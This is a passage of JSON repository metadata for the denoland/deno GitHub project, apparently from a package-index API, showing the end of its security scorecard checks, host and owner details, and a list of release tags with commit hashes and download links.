pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno